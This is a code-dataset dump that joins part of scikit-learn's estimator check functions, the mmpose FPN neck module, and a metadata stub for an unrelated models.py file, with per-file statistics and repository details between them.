@ignore_warnings(category=FutureWarning) def check_regressors_int(name, regressor_orig, strict_mode=True): X, _ = _regression_dataset() X = _pairwise_estimator_convert_X(X[:50], regressor_orig) rnd = np.random.RandomState(0) y = rnd.randint(3, size=X.shape[0]) y = _enforce_estimator_tags_y(regressor_orig, y) rnd = np.random.RandomState(0) # separate estimators to control random seeds regressor_1 = clone(regressor_orig) regressor_2 = clone(regressor_orig) set_random_state(regressor_1) set_random_state(regressor_2) if name in CROSS_DECOMPOSITION: y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))]) y_ = y_.T else: y_ = y # fit regressor_1.fit(X, y_) pred1 = regressor_1.predict(X) regressor_2.fit(X, y_.astype(float)) pred2 = regressor_2.predict(X) assert_allclose(pred1, pred2, atol=1e-2, err_msg=name) @ignore_warnings(category=FutureWarning) def check_regressors_train(name, regressor_orig, readonly_memmap=False, X_dtype=np.float64, strict_mode=True): X, y = _regression_dataset() X = X.astype(X_dtype) X = _pairwise_estimator_convert_X(X, regressor_orig) y = scale(y) # X is already scaled regressor = clone(regressor_orig) y = _enforce_estimator_tags_y(regressor, y) if name in CROSS_DECOMPOSITION: rnd = np.random.RandomState(0) y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))]) y_ = y_.T else: y_ = y if readonly_memmap: X, y, y_ = create_memmap_backed_data([X, y, y_]) if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'): # linear regressors need to set alpha, but not generalized CV ones regressor.alpha = 0.01 if name == 'PassiveAggressiveRegressor': regressor.C = 0.01 # raises error on malformed input for fit with assert_raises(ValueError, msg="The classifier {} does not" " raise an error when incorrect/malformed input " "data for fit is passed. The number of training " "examples is not the same as the number of " "labels. Perhaps use check_X_y in fit.".format(name)): regressor.fit(X, y[:-1]) # fit set_random_state(regressor) regressor.fit(X, y_) regressor.fit(X.tolist(), y_.tolist()) y_pred = regressor.predict(X) assert y_pred.shape == y_.shape # TODO: find out why PLS and CCA fail. RANSAC is random # and furthermore assumes the presence of outliers, hence # skipped if not regressor._get_tags()["poor_score"]: assert regressor.score(X, y_) > 0.5 @ignore_warnings def check_regressors_no_decision_function(name, regressor_orig, strict_mode=True): # checks whether regressors have decision_function or predict_proba rng = np.random.RandomState(0) regressor = clone(regressor_orig) X = rng.normal(size=(10, 4)) X = _pairwise_estimator_convert_X(X, regressor_orig) y = _enforce_estimator_tags_y(regressor, X[:, 0]) if hasattr(regressor, "n_components"): # FIXME CCA, PLS is not robust to rank 1 effects regressor.n_components = 1 regressor.fit(X, y) funcs = ["decision_function", "predict_proba", "predict_log_proba"] for func_name in funcs: func = getattr(regressor, func_name, None) if func is None: # doesn't have function continue # has function. Should raise deprecation warning msg = func_name assert_warns_message(FutureWarning, msg, func, X) @ignore_warnings(category=FutureWarning) def check_class_weight_classifiers(name, classifier_orig, strict_mode=True): if classifier_orig._get_tags()['binary_only']: problems = [2] else: problems = [2, 3] for n_centers in problems: # create a very noisy dataset X, y = make_blobs(centers=n_centers, random_state=0, cluster_std=20) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5, random_state=0) # can't use gram_if_pairwise() here, setting up gram matrix manually if _is_pairwise(classifier_orig): X_test = rbf_kernel(X_test, X_train) X_train = rbf_kernel(X_train, X_train) n_centers = len(np.unique(y_train)) if n_centers == 2: class_weight = {0: 1000, 1: 0.0001} else: class_weight = {0: 1000, 1: 0.0001, 2: 0.0001} classifier = clone(classifier_orig).set_params( class_weight=class_weight) if hasattr(classifier, "n_iter"): classifier.set_params(n_iter=100) if hasattr(classifier, "max_iter"): classifier.set_params(max_iter=1000) if hasattr(classifier, "min_weight_fraction_leaf"): classifier.set_params(min_weight_fraction_leaf=0.01) if hasattr(classifier, "n_iter_no_change"): classifier.set_params(n_iter_no_change=20) set_random_state(classifier) classifier.fit(X_train, y_train) y_pred = classifier.predict(X_test) # XXX: Generally can use 0.89 here. On Windows, LinearSVC gets # 0.88 (Issue #9111) if not classifier_orig._get_tags()['poor_score']: assert np.mean(y_pred == 0) > 0.87 @ignore_warnings(category=FutureWarning) def check_class_weight_balanced_classifiers(name, classifier_orig, X_train, y_train, X_test, y_test, weights, strict_mode=True): classifier = clone(classifier_orig) if hasattr(classifier, "n_iter"): classifier.set_params(n_iter=100) if hasattr(classifier, "max_iter"): classifier.set_params(max_iter=1000) set_random_state(classifier) classifier.fit(X_train, y_train) y_pred = classifier.predict(X_test) classifier.set_params(class_weight='balanced') classifier.fit(X_train, y_train) y_pred_balanced = classifier.predict(X_test) assert (f1_score(y_test, y_pred_balanced, average='weighted') > f1_score(y_test, y_pred, average='weighted')) @ignore_warnings(category=FutureWarning) def check_class_weight_balanced_linear_classifier(name, Classifier, strict_mode=True): """Test class weights with non-contiguous class labels.""" # this is run on classes, not instances, though this should be changed X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0], [1.0, 0.0]]) y = np.array([1, 1, 1, -1, -1]) classifier = Classifier() if hasattr(classifier, "n_iter"): # This is a very small dataset, default n_iter are likely to prevent # convergence classifier.set_params(n_iter=1000) if hasattr(classifier, "max_iter"): classifier.set_params(max_iter=1000) if hasattr(classifier, 'cv'): classifier.set_params(cv=3) set_random_state(classifier) # Let the model compute the class frequencies classifier.set_params(class_weight='balanced') coef_balanced = classifier.fit(X, y).coef_.copy() # Count each label occurrence to reweight manually n_samples = len(y) n_classes = float(len(np.unique(y))) class_weight = {1: n_samples / (np.sum(y == 1) * n_classes), -1: n_samples / (np.sum(y == -1) * n_classes)} classifier.set_params(class_weight=class_weight) coef_manual = classifier.fit(X, y).coef_.copy() assert_allclose(coef_balanced, coef_manual, err_msg="Classifier %s is not computing" " class_weight=balanced properly." % name) @ignore_warnings(category=FutureWarning) def check_estimators_overwrite_params(name, estimator_orig, strict_mode=True): X, y = make_blobs(random_state=0, n_samples=21) # some want non-negative input X -= X.min() X = _pairwise_estimator_convert_X(X, estimator_orig, kernel=rbf_kernel) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator) # Make a physical copy of the original estimator parameters before fitting. params = estimator.get_params() original_params = deepcopy(params) # Fit the model estimator.fit(X, y) # Compare the state of the model parameters with the original parameters new_params = estimator.get_params() for param_name, original_value in original_params.items(): new_value = new_params[param_name] # We should never change or mutate the internal state of input # parameters by default. To check this we use the joblib.hash function # that introspects recursively any subobjects to compute a checksum. # The only exception to this rule of immutable constructor parameters # is possible RandomState instance but in this check we explicitly # fixed the random_state params recursively to be integer seeds. assert joblib.hash(new_value) == joblib.hash(original_value), ( "Estimator %s should not change or mutate " " the parameter %s from %s to %s during fit." % (name, param_name, original_value, new_value)) @ignore_warnings(category=FutureWarning) def check_no_attributes_set_in_init(name, estimator_orig, strict_mode=True): """Check setting during init.""" estimator = clone(estimator_orig) if hasattr(type(estimator).__init__, "deprecated_original"): return init_params = _get_args(type(estimator).__init__) if IS_PYPY: # __init__ signature has additional objects in PyPy for key in ['obj']: if key in init_params: init_params.remove(key) parents_init_params = [param for params_parent in (_get_args(parent) for parent in type(estimator).__mro__) for param in params_parent] # Test for no setting apart from parameters during init invalid_attr = (set(vars(estimator)) - set(init_params) - set(parents_init_params)) assert not invalid_attr, ( "Estimator %s should not set any attribute apart" " from parameters during init. Found attributes %s." % (name, sorted(invalid_attr))) # Ensure that each parameter is set in init invalid_attr = set(init_params) - set(vars(estimator)) - {"self"} assert not invalid_attr, ( "Estimator %s should store all parameters" " as an attribute during init. Did not find " "attributes %s." % (name, sorted(invalid_attr))) @ignore_warnings(category=FutureWarning) def check_sparsify_coefficients(name, estimator_orig, strict_mode=True): X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1], [-1, -2], [2, 2], [-2, -2]]) y = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]) y = _enforce_estimator_tags_y(estimator_orig, y) est = clone(estimator_orig) est.fit(X, y) pred_orig = est.predict(X) # test sparsify with dense inputs est.sparsify() assert sparse.issparse(est.coef_) pred = est.predict(X) assert_array_equal(pred, pred_orig) # pickle and unpickle with sparse coef_ est = pickle.loads(pickle.dumps(est)) assert sparse.issparse(est.coef_) pred = est.predict(X) assert_array_equal(pred, pred_orig) @ignore_warnings(category=FutureWarning) def check_classifier_data_not_an_array(name, estimator_orig, strict_mode=True): X = np.array([[3, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 1], [0, 3], [1, 0], [2, 0], [4, 4], [2, 3], [3, 2]]) X = _pairwise_estimator_convert_X(X, estimator_orig) y = np.array([1, 1, 1, 2, 2, 2, 1, 1, 1, 2, 2, 2]) y = _enforce_estimator_tags_y(estimator_orig, y) for obj_type in ["NotAnArray", "PandasDataframe"]: check_estimators_data_not_an_array(name, estimator_orig, X, y, obj_type) @ignore_warnings(category=FutureWarning) def check_regressor_data_not_an_array(name, estimator_orig, strict_mode=True): X, y = _regression_dataset() X = _pairwise_estimator_convert_X(X, estimator_orig) y = _enforce_estimator_tags_y(estimator_orig, y) for obj_type in ["NotAnArray", "PandasDataframe"]: check_estimators_data_not_an_array(name, estimator_orig, X, y, obj_type) @ignore_warnings(category=FutureWarning) def check_estimators_data_not_an_array(name, estimator_orig, X, y, obj_type, strict_mode=True): if name in CROSS_DECOMPOSITION: raise SkipTest("Skipping check_estimators_data_not_an_array " "for cross decomposition module as estimators " "are not deterministic.") # separate estimators to control random seeds estimator_1 = clone(estimator_orig) estimator_2 = clone(estimator_orig) set_random_state(estimator_1) set_random_state(estimator_2) if obj_type not in ["NotAnArray", 'PandasDataframe']: raise ValueError("Data type {0} not supported".format(obj_type)) if obj_type == "NotAnArray": y_ = _NotAnArray(np.asarray(y)) X_ = _NotAnArray(np.asarray(X)) else: # Here pandas objects (Series and DataFrame) are tested explicitly # because some estimators may handle them (especially their indexing) # specially. try: import pandas as pd y_ = np.asarray(y) if y_.ndim == 1: y_ = pd.Series(y_) else: y_ = pd.DataFrame(y_) X_ = pd.DataFrame(np.asarray(X)) except ImportError: raise SkipTest("pandas is not installed: not checking estimators " "for pandas objects.") # fit estimator_1.fit(X_, y_) pred1 = estimator_1.predict(X_) estimator_2.fit(X, y) pred2 = estimator_2.predict(X) assert_allclose(pred1, pred2, atol=1e-2, err_msg=name) def check_parameters_default_constructible(name, Estimator, strict_mode=True): # test default-constructibility # get rid of deprecation warnings Estimator = Estimator.__class__ with ignore_warnings(category=FutureWarning): estimator = _construct_instance(Estimator) # test cloning clone(estimator) # test __repr__ repr(estimator) # test that set_params returns self assert estimator.set_params() is estimator # test if init does nothing but set parameters # this is important for grid_search etc. # We get the default parameters from init and then # compare these against the actual values of the attributes. # this comes from getattr. Gets rid of deprecation decorator. init = getattr(estimator.__init__, 'deprecated_original', estimator.__init__) try: def param_filter(p): """Identify hyper parameters of an estimator.""" return (p.name != 'self' and p.kind != p.VAR_KEYWORD and p.kind != p.VAR_POSITIONAL) init_params = [p for p in signature(init).parameters.values() if param_filter(p)] except (TypeError, ValueError): # init is not a python function. # true for mixins return params = estimator.get_params() # they can need a non-default argument init_params = init_params[len(getattr( estimator, '_required_parameters', [])):] for init_param in init_params: assert init_param.default != init_param.empty, ( "parameter %s for %s has no default value" % (init_param.name, type(estimator).__name__)) allowed_types = { str, int, float, bool, tuple, type(None), type, types.FunctionType, joblib.Memory, } # Any numpy numeric such as np.int32. allowed_types.update(np.core.numerictypes.allTypes.values()) assert type(init_param.default) in allowed_types, ( f"Parameter '{init_param.name}' of estimator " f"'{Estimator.__name__}' is of type " f"{type(init_param.default).__name__} which is not " f"allowed. All init parameters have to be immutable to " f"make cloning possible. Therefore we restrict the set of " f"legal types to " f"{set(type.__name__ for type in allowed_types)}." ) if init_param.name not in params.keys(): # deprecated parameter, not in get_params assert init_param.default is None, ( f"Estimator parameter '{init_param.name}' of estimator " f"'{Estimator.__name__}' is not returned by get_params. " f"If it is deprecated, set its default value to None." ) continue param_value = params[init_param.name] if isinstance(param_value, np.ndarray): assert_array_equal(param_value, init_param.default) else: failure_text = ( f"Parameter {init_param.name} was mutated on init. All " f"parameters must be stored unchanged." ) if is_scalar_nan(param_value): # Allows to set default parameters to np.nan assert param_value is init_param.default, failure_text else: assert param_value == init_param.default, failure_text def _enforce_estimator_tags_y(estimator, y): # Estimators with a `requires_positive_y` tag only accept strictly positive # data if estimator._get_tags()["requires_positive_y"]: # Create strictly positive y. The minimal increment above 0 is 1, as # y could be of integer dtype. y += 1 + abs(y.min()) # Estimators with a `binary_only` tag only accept up to two unique y values if estimator._get_tags()["binary_only"] and y.size > 0: y = np.where(y == y.flat[0], y, y.flat[0] + 1) # Estimators in mono_output_task_error raise ValueError if y is of 1-D # Convert into a 2-D y for those estimators. if estimator._get_tags()["multioutput_only"]: return np.reshape(y, (-1, 1)) return y def _enforce_estimator_tags_x(estimator, X): # Estimators with a `_pairwise` tag only accept # X of shape (`n_samples`, `n_samples`) if hasattr(estimator, '_pairwise'): X = X.dot(X.T) # Estimators with `1darray` in `X_types` tag only accept # X of shape (`n_samples`,) if '1darray' in estimator._get_tags()['X_types']: X = X[:, 0] # Estimators with a `requires_positive_X` tag only accept # strictly positive data if estimator._get_tags()['requires_positive_X']: X -= X.min() return X @ignore_warnings(category=FutureWarning) def check_non_transformer_estimators_n_iter(name, estimator_orig, strict_mode=True): # Test that estimators that are not transformers with a parameter # max_iter, return the attribute of n_iter_ at least 1. # These models are dependent on external solvers like # libsvm and accessing the iter parameter is non-trivial. not_run_check_n_iter = ['Ridge', 'SVR', 'NuSVR', 'NuSVC', 'RidgeClassifier', 'SVC', 'RandomizedLasso', 'LogisticRegressionCV', 'LinearSVC', 'LogisticRegression'] # Tested in test_transformer_n_iter not_run_check_n_iter += CROSS_DECOMPOSITION if name in not_run_check_n_iter: return # LassoLars stops early for the default alpha=1.0 the iris dataset. if name == 'LassoLars': estimator = clone(estimator_orig).set_params(alpha=0.) else: estimator = clone(estimator_orig) if hasattr(estimator, 'max_iter'): iris = load_iris() X, y_ = iris.data, iris.target y_ = _enforce_estimator_tags_y(estimator, y_) set_random_state(estimator, 0) estimator.fit(X, y_) assert estimator.n_iter_ >= 1 @ignore_warnings(category=FutureWarning) def check_transformer_n_iter(name, estimator_orig, strict_mode=True): # Test that transformers with a parameter max_iter, return the # attribute of n_iter_ at least 1. estimator = clone(estimator_orig) if hasattr(estimator, "max_iter"): if name in CROSS_DECOMPOSITION: # Check using default data X = [[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]] y_ = [[0.1, -0.2], [0.9, 1.1], [0.1, -0.5], [0.3, -0.2]] else: X, y_ = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X -= X.min() - 0.1 set_random_state(estimator, 0) estimator.fit(X, y_) # These return a n_iter per component. if name in CROSS_DECOMPOSITION: for iter_ in estimator.n_iter_: assert iter_ >= 1 else: assert estimator.n_iter_ >= 1 @ignore_warnings(category=FutureWarning) def check_get_params_invariance(name, estimator_orig, strict_mode=True): # Checks if get_params(deep=False) is a subset of get_params(deep=True) e = clone(estimator_orig) shallow_params = e.get_params(deep=False) deep_params = e.get_params(deep=True) assert all(item in deep_params.items() for item in shallow_params.items()) @ignore_warnings(category=FutureWarning) def check_set_params(name, estimator_orig, strict_mode=True): # Check that get_params() returns the same thing # before and after set_params() with some fuzz estimator = clone(estimator_orig) orig_params = estimator.get_params(deep=False) msg = ("get_params result does not match what was passed to set_params") estimator.set_params(**orig_params) curr_params = estimator.get_params(deep=False) assert set(orig_params.keys()) == set(curr_params.keys()), msg for k, v in curr_params.items(): assert orig_params[k] is v, msg # some fuzz values test_values = [-np.inf, np.inf, None] test_params = deepcopy(orig_params) for param_name in orig_params.keys(): default_value = orig_params[param_name] for value in test_values: test_params[param_name] = value try: estimator.set_params(**test_params) except (TypeError, ValueError) as e: e_type = e.__class__.__name__ # Exception occurred, possibly parameter validation warnings.warn("{0} occurred during set_params of param {1} on " "{2}. It is recommended to delay parameter " "validation until fit.".format(e_type, param_name, name)) change_warning_msg = "Estimator's parameters changed after " \ "set_params raised {}".format(e_type) params_before_exception = curr_params curr_params = estimator.get_params(deep=False) try: assert (set(params_before_exception.keys()) == set(curr_params.keys())) for k, v in curr_params.items(): assert params_before_exception[k] is v except AssertionError: warnings.warn(change_warning_msg) else: curr_params = estimator.get_params(deep=False) assert (set(test_params.keys()) == set(curr_params.keys())), msg for k, v in curr_params.items(): assert test_params[k] is v, msg test_params[param_name] = default_value @ignore_warnings(category=FutureWarning) def check_classifiers_regression_target(name, estimator_orig, strict_mode=True): # Check if classifier throws an exception when fed regression targets X, y = _regression_dataset() X = X + 1 + abs(X.min(axis=0)) # be sure that X is non-negative e = clone(estimator_orig) msg = 'Unknown label type: ' if not e._get_tags()["no_validation"]: assert_raises_regex(ValueError, msg, e.fit, X, y) @ignore_warnings(category=FutureWarning) def check_decision_proba_consistency(name, estimator_orig, strict_mode=True): # Check whether an estimator having both decision_function and # predict_proba methods has outputs with perfect rank correlation. centers = [(2, 2), (4, 4)] X, y = make_blobs(n_samples=100, random_state=0, n_features=4, centers=centers, cluster_std=1.0, shuffle=True) X_test = np.random.randn(20, 2) + 4 estimator = clone(estimator_orig) if (hasattr(estimator, "decision_function") and hasattr(estimator, "predict_proba")): estimator.fit(X, y) # Since the link function from decision_function() to predict_proba() # is sometimes not precise enough (typically expit), we round to the # 10th decimal to avoid numerical issues. a = estimator.predict_proba(X_test)[:, 1].round(decimals=10) b = estimator.decision_function(X_test).round(decimals=10) assert_array_equal(rankdata(a), rankdata(b)) def check_outliers_fit_predict(name, estimator_orig, strict_mode=True): # Check fit_predict for outlier detectors. n_samples = 300 X, _ = make_blobs(n_samples=n_samples, random_state=0) X = shuffle(X, random_state=7) n_samples, n_features = X.shape estimator = clone(estimator_orig) set_random_state(estimator) y_pred = estimator.fit_predict(X) assert y_pred.shape == (n_samples,) assert y_pred.dtype.kind == 'i' assert_array_equal(np.unique(y_pred), np.array([-1, 1])) # check fit_predict = fit.predict when the estimator has both a predict and # a fit_predict method. recall that it is already assumed here that the # estimator has a fit_predict method if hasattr(estimator, 'predict'): y_pred_2 = estimator.fit(X).predict(X) assert_array_equal(y_pred, y_pred_2) if hasattr(estimator, "contamination"): # proportion of outliers equal to contamination parameter when not # set to 'auto' expected_outliers = 30 contamination = float(expected_outliers)/n_samples estimator.set_params(contamination=contamination) y_pred = estimator.fit_predict(X) num_outliers = np.sum(y_pred != 1) # num_outliers should be equal to expected_outliers unless # there are ties in the decision_function values. this can # only be tested for estimators with a decision_function # method if (num_outliers != expected_outliers and hasattr(estimator, 'decision_function')): decision = estimator.decision_function(X) check_outlier_corruption(num_outliers, expected_outliers, decision) # raises error when contamination is a scalar and not in [0,1] for contamination in [-0.5, 2.3]: estimator.set_params(contamination=contamination) assert_raises(ValueError, estimator.fit_predict, X) def check_fit_non_negative(name, estimator_orig, strict_mode=True): # Check that proper warning is raised for non-negative X # when tag requires_positive_X is present X = np.array([[-1., 1], [-1., 1]]) y = np.array([1, 2]) estimator = clone(estimator_orig) if strict_mode: assert_raises_regex(ValueError, "Negative values in data passed to", estimator.fit, X, y) else: # Don't check error message if strict mode is off assert_raises(ValueError, estimator.fit, X, y) def check_fit_idempotent(name, estimator_orig, strict_mode=True): # Check that est.fit(X) is the same as est.fit(X).fit(X). Ideally we would # check that the estimated parameters during training (e.g. coefs_) are # the same, but having a universal comparison function for those # attributes is difficult and full of edge cases. So instead we check that # predict(), predict_proba(), decision_function() and transform() return # the same results. check_methods = ["predict", "transform", "decision_function", "predict_proba"] rng = np.random.RandomState(0) estimator = clone(estimator_orig) set_random_state(estimator) if 'warm_start' in estimator.get_params().keys(): estimator.set_params(warm_start=False) n_samples = 100 X = rng.normal(loc=100, size=(n_samples, 2)) X = _pairwise_estimator_convert_X(X, estimator) if is_regressor(estimator_orig): y = rng.normal(size=n_samples) else: y = rng.randint(low=0, high=2, size=n_samples) y = _enforce_estimator_tags_y(estimator, y) train, test = next(ShuffleSplit(test_size=.2, random_state=rng).split(X)) X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) # Fit for the first time estimator.fit(X_train, y_train) result = {method: getattr(estimator, method)(X_test) for method in check_methods if hasattr(estimator, method)} # Fit again set_random_state(estimator) estimator.fit(X_train, y_train) for method in check_methods: if hasattr(estimator, method): new_result = getattr(estimator, method)(X_test) if np.issubdtype(new_result.dtype, np.floating): tol = 2*np.finfo(new_result.dtype).eps else: tol = 2*np.finfo(np.float64).eps assert_allclose_dense_sparse( result[method], new_result, atol=max(tol, 1e-9), rtol=max(tol, 1e-7), err_msg="Idempotency check failed for method {}".format(method) ) def check_n_features_in(name, estimator_orig, strict_mode=True): # Make sure that n_features_in_ attribute doesn't exist until fit is # called, and that its value is correct. rng = np.random.RandomState(0) estimator = clone(estimator_orig) set_random_state(estimator) if 'warm_start' in estimator.get_params(): estimator.set_params(warm_start=False) n_samples = 100 X = rng.normal(loc=100, size=(n_samples, 2)) X = _pairwise_estimator_convert_X(X, estimator) if is_regressor(estimator_orig): y = rng.normal(size=n_samples) else: y = rng.randint(low=0, high=2, size=n_samples) y = _enforce_estimator_tags_y(estimator, y) assert not hasattr(estimator, 'n_features_in_') estimator.fit(X, y) if hasattr(estimator, 'n_features_in_'): assert estimator.n_features_in_ == X.shape[1] else: warnings.warn( "As of scikit-learn 0.23, estimators should expose a " "n_features_in_ attribute, unless the 'no_validation' tag is " "True. This attribute should be equal to the number of features " "passed to the fit method. " "An error will be raised from version 0.25 when calling " "check_estimator(). " "See SLEP010: " "https://scikit-learn-enhancement-proposals.readthedocs.io/en/latest/slep010/proposal.html", # noqa FutureWarning ) def check_requires_y_none(name, estimator_orig, strict_mode=True): # Make sure that an estimator with requires_y=True fails gracefully when # given y=None rng = np.random.RandomState(0) estimator = clone(estimator_orig) set_random_state(estimator) n_samples = 100 X = rng.normal(loc=100, size=(n_samples, 2)) X = _pairwise_estimator_convert_X(X, estimator) warning_msg = ("As of scikit-learn 0.23, estimators should have a " "'requires_y' tag set to the appropriate value. " "The default value of the tag is False. " "An error will be raised from version 0.25 when calling " "check_estimator() if the tag isn't properly set.") expected_err_msgs = ( "requires y to be passed, but the target y is None", "Expected array-like (array or non-string sequence), got None", "y should be a 1d array" ) try: estimator.fit(X, None) except ValueError as ve: if not any(msg in str(ve) for msg in expected_err_msgs): warnings.warn(warning_msg, FutureWarning) # set of checks that are completely strict, i.e. they have no non-strict part _FULLY_STRICT_CHECKS = set([ 'check_n_features_in', ])
38.665393
112
0.635935
795a8af0b6904153a9b4e1a41d7b803381874162
8,792
py
Python
mmpose/models/necks/fpn.py
pallgeuer/mmpose
d3c17d5e6bdb9dbaca19f3bf53aa2802105355fd
[ "Apache-2.0" ]
null
null
null
mmpose/models/necks/fpn.py
pallgeuer/mmpose
d3c17d5e6bdb9dbaca19f3bf53aa2802105355fd
[ "Apache-2.0" ]
null
null
null
mmpose/models/necks/fpn.py
pallgeuer/mmpose
d3c17d5e6bdb9dbaca19f3bf53aa2802105355fd
[ "Apache-2.0" ]
null
null
null
# Copyright (c) OpenMMLab. All rights reserved. import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ConvModule, xavier_init from mmcv.runner import auto_fp16 from ..builder import NECKS @NECKS.register_module() class FPN(nn.Module): r"""Feature Pyramid Network. This is an implementation of paper `Feature Pyramid Networks for Object Detection <https://arxiv.org/abs/1612.03144>`_. Args: in_channels (list[int]): Number of input channels per scale. out_channels (int): Number of output channels (used at each scale). num_outs (int): Number of output scales. start_level (int): Index of the start input backbone level used to build the feature pyramid. Default: 0. end_level (int): Index of the end input backbone level (exclusive) to build the feature pyramid. Default: -1, which means the last level. add_extra_convs (bool | str): If bool, it decides whether to add conv layers on top of the original feature maps. Default to False. If True, it is equivalent to `add_extra_convs='on_input'`. If str, it specifies the source feature map of the extra convs. Only the following options are allowed - 'on_input': Last feat map of neck inputs (i.e. backbone feature). - 'on_lateral': Last feature map after lateral convs. - 'on_output': The last output feature map after fpn convs. relu_before_extra_convs (bool): Whether to apply relu before the extra conv. Default: False. no_norm_on_lateral (bool): Whether to apply norm on lateral. Default: False. conv_cfg (dict): Config dict for convolution layer. Default: None. norm_cfg (dict): Config dict for normalization layer. Default: None. act_cfg (dict): Config dict for activation layer in ConvModule. Default: None. upsample_cfg (dict): Config dict for interpolate layer. Default: dict(mode='nearest'). Example: >>> import torch >>> in_channels = [2, 3, 5, 7] >>> scales = [340, 170, 84, 43] >>> inputs = [torch.rand(1, c, s, s) ... for c, s in zip(in_channels, scales)] >>> self = FPN(in_channels, 11, len(in_channels)).eval() >>> outputs = self.forward(inputs) >>> for i in range(len(outputs)): ... print(f'outputs[{i}].shape = {outputs[i].shape}') outputs[0].shape = torch.Size([1, 11, 340, 340]) outputs[1].shape = torch.Size([1, 11, 170, 170]) outputs[2].shape = torch.Size([1, 11, 84, 84]) outputs[3].shape = torch.Size([1, 11, 43, 43]) """ def __init__(self, in_channels, out_channels, num_outs, start_level=0, end_level=-1, add_extra_convs=False, relu_before_extra_convs=False, no_norm_on_lateral=False, conv_cfg=None, norm_cfg=None, act_cfg=None, upsample_cfg=dict(mode='nearest')): super().__init__() assert isinstance(in_channels, list) self.in_channels = in_channels self.out_channels = out_channels self.num_ins = len(in_channels) self.num_outs = num_outs self.relu_before_extra_convs = relu_before_extra_convs self.no_norm_on_lateral = no_norm_on_lateral self.fp16_enabled = False self.upsample_cfg = upsample_cfg.copy() if end_level == -1 or end_level == self.num_ins - 1: self.backbone_end_level = self.num_ins assert num_outs >= self.num_ins - start_level else: # if end_level is not the last level, no extra level is allowed self.backbone_end_level = end_level + 1 assert end_level < self.num_ins assert num_outs == end_level - start_level + 1 self.start_level = start_level self.end_level = end_level self.add_extra_convs = add_extra_convs assert isinstance(add_extra_convs, (str, bool)) if isinstance(add_extra_convs, str): # Extra_convs_source choices: 'on_input', 'on_lateral', 'on_output' assert add_extra_convs in ('on_input', 'on_lateral', 'on_output') elif add_extra_convs: # True self.add_extra_convs = 'on_input' self.lateral_convs = nn.ModuleList() self.fpn_convs = nn.ModuleList() for i in range(self.start_level, self.backbone_end_level): l_conv = ConvModule( in_channels[i], out_channels, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg if not self.no_norm_on_lateral else None, act_cfg=act_cfg, inplace=False) fpn_conv = ConvModule( out_channels, out_channels, 3, padding=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg, inplace=False) self.lateral_convs.append(l_conv) self.fpn_convs.append(fpn_conv) # add extra conv layers (e.g., RetinaNet) extra_levels = num_outs - self.backbone_end_level + self.start_level if self.add_extra_convs and extra_levels >= 1: for i in range(extra_levels): if i == 0 and self.add_extra_convs == 'on_input': in_channels = self.in_channels[self.backbone_end_level - 1] else: in_channels = out_channels extra_fpn_conv = ConvModule( in_channels, out_channels, 3, stride=2, padding=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg, inplace=False) self.fpn_convs.append(extra_fpn_conv) def init_weights(self): """Initialize model weights.""" for m in self.modules(): if isinstance(m, nn.Conv2d): xavier_init(m, distribution='uniform') @auto_fp16() def forward(self, inputs): """Forward function.""" assert len(inputs) == len(self.in_channels) # build laterals laterals = [ lateral_conv(inputs[i + self.start_level]) for i, lateral_conv in enumerate(self.lateral_convs) ] # build top-down path used_backbone_levels = len(laterals) for i in range(used_backbone_levels - 1, 0, -1): # In some cases, fixing `scale factor` (e.g. 2) is preferred, but # it cannot co-exist with `size` in `F.interpolate`. if 'scale_factor' in self.upsample_cfg: # fix runtime error of "+=" inplace operation in PyTorch 1.10 laterals[i - 1] = laterals[i - 1] + F.interpolate( laterals[i], **self.upsample_cfg) else: prev_shape = laterals[i - 1].shape[2:] laterals[i - 1] = laterals[i - 1] + F.interpolate( laterals[i], size=prev_shape, **self.upsample_cfg) # build outputs # part 1: from original levels outs = [ self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels) ] # part 2: add extra levels if self.num_outs > len(outs): # use max pool to get more levels on top of outputs # (e.g., Faster R-CNN, Mask R-CNN) if not self.add_extra_convs: for i in range(self.num_outs - used_backbone_levels): outs.append(F.max_pool2d(outs[-1], 1, stride=2)) # add conv layers on top of original feature maps (RetinaNet) else: if self.add_extra_convs == 'on_input': extra_source = inputs[self.backbone_end_level - 1] elif self.add_extra_convs == 'on_lateral': extra_source = laterals[-1] elif self.add_extra_convs == 'on_output': extra_source = outs[-1] else: raise NotImplementedError outs.append(self.fpn_convs[used_backbone_levels](extra_source)) for i in range(used_backbone_levels + 1, self.num_outs): if self.relu_before_extra_convs: outs.append(self.fpn_convs[i](F.relu(outs[-1]))) else: outs.append(self.fpn_convs[i](outs[-1])) return outs
42.269231
79
0.568016
795a8ca034204dbf6d91d59e13c32e18d9f88d42
7,154
py
Python
application/models.py
valr/lci
82a9ced51d66e5fe3432ff1d54a864ec396e4217
[ "MIT" ]
null
null
null
application/models.py
valr/lci
82a9ced51d66e5fe3432ff1d54a864ec396e4217
[ "MIT" ]
null
null
null
application/models.py
valr/lci
82a9ced51d66e5fe3432ff1d54a864ec396e4217
[ "MIT" ]
null
null
null
